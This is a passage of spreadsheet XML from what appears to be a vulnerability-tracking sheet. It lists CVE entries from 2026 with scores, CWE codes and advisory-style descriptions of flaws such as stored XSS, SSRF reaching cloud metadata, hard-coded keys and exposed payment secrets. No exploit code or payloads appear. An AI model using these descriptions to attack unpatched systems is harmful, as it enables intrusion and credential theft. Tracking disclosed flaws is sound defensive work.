      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93296</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site scripting (XSS) vulnerability in the Overmind theme's statistics views. The event General card (event_general.ctp) and the server/feed preview card (preview_general.ctp) constructed donut chart legend labels by directly concatenating object name or category keys into an innerHTML string without HTML-encoding. Because MISP object names (e.g., attribute names, event names, or server/feed identifiers) are user-controllable by any authenticated user with sufficient permissions to create or modify such objects, an attacker could craft a name containing malicious markup (for example, a script tag or event-handler attribute). When any other user viewed the affected Overmind dashboard, the injected markup would be interpreted as live HTML/JavaScript in the victim's browser, executing in the context of the MISP application origin. This could allow session hijacking, data exfiltration, or arbitrary actions performed on behalf of the victim. The vulnerability requires the attacker to have low-level authenticated access to create or rename an object whose name is rendered in the legend, and the victim to view the Overmind event or server preview page. No special browser conditions or race conditions are required.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93296</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54546</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr">
        <is>
          <t>npm:@tak-ps/cloudtak</t>
        </is>
      </c>
      <c r="M346" s="5" t="inlineStr">
        <is>
          <t>13.22.1</t>
        </is>
      </c>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>CloudTAK is a browser-based Common Operating Picture and situational awareness tool compatible with TAK. Prior to 13.22.1, the authenticated PUT /api/basemap endpoint passes an attacker-controlled URL through importBasemapURL() in api/routes/basemap.ts to fetch(url) without resolved-address classification or redirect revalidation. BasemapProtocol.isValidURL in api/lib/interface-basemap.ts checks only the HTTP or HTTPS scheme and is not applied on the vulnerable import path. Direct internal addresses, alternate IP encodings, and redirects to internal addresses can reach cloud metadata, loopback, private, and CGNAT HTTP services. The OptionalTileJSON response reflects fields including name, attribution, and tiles[0] to the caller, making the request forgery full-read rather than blind and enabling cloud credential theft and internal service disclosure. This issue is fixed in version 13.22.1.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54546</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50603</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer Agent Service component included with NitroSense and PredatorSense. The vulnerability is caused by the use of a hard-coded AES encryption key within the software. Under certain circumstances, a local attacker may be able to use the embedded key to access protected information or perform unauthorized actions.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50603</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50604</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer Agent Service component included with NitroSense and PredatorSense. The socket handshake process does not properly require authentication before granting access to the service. Under certain circumstances, an unauthorized connection may be established, potentially allowing access to functionality that should be restricted.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50604</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91019</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>The Event Booking Manager for WooCommerce  WordPress plugin before 5.6.0 does not restrict who can view its stored payment gateway configuration, allowing users with Contributor-level access and above to read the site's PayPal and Stripe credentials, including their secret keys.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91019</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92921</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-916</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 stores account passwords using single-round MD5 with only the username as salt and no key derivation function. Attackers with database access can recover plaintext passwords through offline dictionary or brute-force attacks due to negligible computational effort.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92921</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54645</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/products.index.inc.php reads the description, description_short, and spec_copy rich-text fields from $GLOBALS['RAW']['POST'] and removes only script elements before the values are stored and rendered through Smarty templates. An administrator with product-editing rights can store event-handler attributes, SVG content, or javascript: URIs that bypass this filter, causing persistent JavaScript execution when a storefront visitor or another administrator views the product content and enabling session exposure or unauthorized browser-context actions. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54645</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86824</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-326</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>The Newsletter  WordPress plugin before 9.3.8 does not generate its email tracking signing key with sufficient entropy and signs its tracking links with an unkeyed hash, allowing an unauthenticated attacker who recovers that key offline to forge tracking links, obtain any subscriber's session token, and read and modify that subscriber's stored personal data.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86824</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92611</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-863</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ankaios versions 0.6.0 to before 1.0.4, `LogRule::matches` in the agent control-interface authorizer stops at the first wildcard pattern in a single rule instead of evaluating later entries, which can cause deny `LogRule` entries to be skipped and allow unauthorized access to another workload's logs.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92611</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54565</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-1385, CWE-200, CWE-359, CWE-918</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>rhwp is an HWP viewer and editor implemented in Rust and WebAssembly. Prior to rhwp 0.7.15 and rhwp Chrome and Firefox extension 0.2.4, the browser extensions use an all-URLs host permission to detect HWP and HWPX links on visited pages, but the service workers do not validate message senders, URL schemes, or destination addresses before privileged fetches. The affected paths are rhwp-chrome/manifest.json, rhwp-chrome/content-script.js, rhwp-chrome/sw/message-router.js, rhwp-chrome/sw/thumbnail-extractor.js, rhwp-firefox/manifest.json, rhwp-firefox/content-script.js, rhwp-firefox/sw/message-router.js, and rhwp-firefox/sw/thumbnail-extractor.js. An untrusted page can make the fetch-file and extract-thumbnail handlers request localhost or private-network resources. When a target HWP or HWPX file contains an extractable PrvImage, the extension returns the preview as a data URI in page-readable DOM, allowing page script to read it. The flaw also permits internal-resource existence and port probing and extension presence or version fingerprinting. Exploitation requires a user to visit an untrusted page while the extension is enabled, and preview disclosure is limited to an extractable PrvImage. This issue is fixed in rhwp 0.7.15 and rhwp Chrome and Firefox extension 0.2.4.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54565</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54495</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>The OpenFeature Operator allows users to expose feature flags to applications. In version 0.9.2 and earlier, a tenant who can create a controller-owned workload can use the openfeature.dev/featureflagsource annotation with NAMESPACE/NAME syntax to reference a FeatureFlagSource or InProcessConfiguration in another namespace. On multi-tenant clusters that use namespaces as trust boundaries, the cluster-scoped operator reads that resource and materializes spec.envVars literal values, spec.httpSyncBearerToken, sync URIs, and supporting ConfigMaps into the tenant's workload. Single-tenant clusters are not impacted, secretKeyRef and configMapKeyRef values remain namespace-local, and creating a FeatureFlagSource is not required.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54495</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54551</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>WireGuard Portal, or wg-portal, is a web-based configuration portal for WireGuard server management. From 2.2.0 until 2.3.0, the authenticated GET /api/v0/ws statistics WebSocket in internal/app/api/v0/handlers/endpoint_websocket.go subscribes to TopicPeerStatsUpdated and TopicInterfaceStatsUpdated and forwards every TrafficDelta event without per-user authorization in handleWebsocket(). A low-privilege user can enumerate peer public keys through EntityId and monitor BytesReceived and BytesTransmitted values for peers belonging to other users. The same connection exposes interface_stats and interface names that the REST API limits to administrators. Tunnel content, AllowedIPs, and user identities remain authorization-gated. This issue is fixed in version 2.3.0.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54551</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78427</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>The NeuVector admission webhook silently excludes containers from policy evaluation when their image path matches one of three hardcoded service mesh sidecar images. Since the image path is entirely controlled by the workload author, any user capable of deploying workloads can evade admission deny rules simply by naming their image path after one of these sidecar images.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78427</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87829</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>The Checkout Field Manager (Checkout Manager) for WooCommerce WordPress plugin before 7.9.7 does not properly validate the ownership of an attachment before deleting it, allowing any authenticated user such as a customer to delete arbitrary media attachments belonging to other users.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87829</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87831</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>The Checkout Field Manager (Checkout Manager) for WooCommerce WordPress plugin before 7.9.7 does not properly validate the ownership of an attachment before deleting it, allowing any authenticated user such as a customer to delete arbitrary media attachments belonging to other users.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87831</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
